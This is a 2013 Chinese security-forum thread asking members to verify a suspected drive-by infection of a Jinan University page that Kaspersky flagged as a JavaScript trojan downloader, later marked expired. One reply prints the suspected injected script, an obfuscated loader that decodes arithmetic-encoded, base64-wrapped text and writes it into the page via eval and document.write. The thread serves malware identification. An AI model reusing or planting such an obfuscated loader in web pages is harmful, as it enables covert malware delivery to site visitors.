疑似挂马【失效 by 蓝核】

angir

hxxp://fc.jnu.edu.cn/info/kaoshizhongxin/kaodiantonggao/

无法访问该网页

请求对象位于网址：

hxxp://fc.jnu.edu.cn/info/kaoshizhongxin/
kaodiantonggao/

检测到威胁：

对象已感染病毒Trojan-Downloader.JS.Agent.elz
发生时间： 20:44:31

手提没有工具检测不到，求鉴定

蓝核

1. <script>
   
2. var a1 = "ABCDEFG";
   
3. var a2 = "HIJKLMNOP";
   
4. var a3 = "QRSTUVWXYZabcdef";
   
5. var keyStrs = a1+a2+a3+"ghijklmnopqrstuv"+"wxyz0123456789+/"+"=";
   
6. function mydata(input){
   
7.         var output="";
   
8.         var chr1,chr2,chr3="";
   
9.         var enc1,enc2,enc3,enc4="";
   
10.         var i=0;
    
11.         var base64test=/[^A-Za-z0-9\+\/\=]/g;
    
12.         input=input.replace(/[^A-Za-z0-9\+\/\=]/g,"");
    
13.         do{
    
14.                 enc1=keyStrs.indexOf(input.charAt(i++));
    
15.                 enc2=keyStrs.indexOf(input.charAt(i++));
    
16.                 enc3=keyStrs.indexOf(input.charAt(i++));
    
17.                 enc4=keyStrs.indexOf(input.charAt(i++));
    
18.                 chr1=(enc1<<2)|(enc2>>4);
    
19.                 chr2=((enc2&15)<<4)|(enc3>>2);
    
20.                 chr3=((enc3&3)<<6)|enc4;
    
21.                 output=output+String.fromCharCode(chr1);
    
22.                 if(enc3!=64){output=output+String.fromCharCode(chr2);};
    
23.                 if(enc4!=64){output=output+String.fromCharCode(chr3);};
    
24.                 chr1=chr2=chr3="";
    
25.                 enc1=enc2=enc3=enc4="";
    
26.         };
    
27.         while(i<input.length);return output;
    
28.         };
    
29. t="5040 / 63 ,4900 / 70 ,9 + 69 ,3740 / 55 ,29 + 56 ,4387 / 41 ,169 - 61 ,3078 / 38 ,164 - 78 ,108 - 41 ,6 + 60 ,48 + 74 ,73 + 26 ,173 - 64 ,42 + 35 ,81 - 24 ,143 - 70 ,41 + 68 ,2912 / 28 ,38 + 10 ,3300 / 33 ,5 + 67 ,2340 / 36 ,4 + 50 ,26 + 50 ,11 + 110 ,50 + 7 ,47 + 4 ,19 + 81 ,6 + 45 ,176 - 77 ,175 - 58 ,5580 / 62 ,79 - 29 ,1767 / 31 ,12036 / 102 ,2880 / 32 ,1900 / 38 ,2760 / 23 ,3996 / 37 ,1691 / 19 ,121 - 34 ,144 - 62 ,35 + 87 ,86 + 12 ,12 + 55 ,2491 / 47 ,173 - 67 ,58 + 40 ,76 - 26 ,2208 / 46 ,22 + 96 ,116 - 17 ,41 + 10 ,51 + 15 ,86 + 20 ,21 + 77 ,12 + 38 ,79 + 3 ,99 + 9 ,81 - 5 ,150 / 3 ,1170 / 15 ,6902 / 58 ,10 + 66 ,6322 / 58 ,4592 / 41 ,107 + 15 ,7 + 66 ,198 - 92 ,97 - 45 ,87 - 31 ,28 + 48 ,59 - 8 ,17 + 61 ,192 - 86 ,1089 / 11 ,8938 / 82 ,167 - 59 ,224 - 105 ,78 + 22 ,52 + 16 ,13 + 39 ,55 + 6 ";
    
30. t=eval("mydata(String.fromCharCode("+t+"))");
    
31. document.write(t);
    
32. </script>

复制代码

卡巴报的么？除了这段代码我看不懂之外，其他的地方没有发现有码

angir

蓝核 发表于 2013-4-13 20:57
卡巴报的么？除了这段代码我看不懂之外，其他的地方没有发现有码

辛苦了 是卡巴报的~

蓝核

angir 发表于 2013-4-13 21:03
辛苦了 是卡巴报的~

等等看其他人吧，这个网站我有时候无法获取代码……所以还要等其他人鉴定下

fireold

Web content virus scan

Address:         fc.jnu.edu.cn
Virus:         Trojan.JS.Downloader.BZZ (2x) (Engine A)
Status:         Access denied.


Address:         fc.jnu.edu.cn/info/kaoshizhongxin/kaodiantonggao/
Virus:         Trojan.JS.Downloader.BZZ (2x) (Engine A)
Status:         Access denied.

蓝核

亲爱的会员您好，我今天再次检查了该网站，但是发现……该网站是皮肤换了还是界面换了？

如果说挂了不该有的链接，那就是这个的广告了……

1. <td align="center"><a href="http://www.phome.net/OpenSource/" target="_blank"><img src="/skin/default/images/opensource.gif" width="100%" height="70" border="0" /></a></td>

复制代码

但是该网站……不知道名声如何呢，看界面倒是挺正经的

建议还是开沙盘或者去问问该学校的教务处吧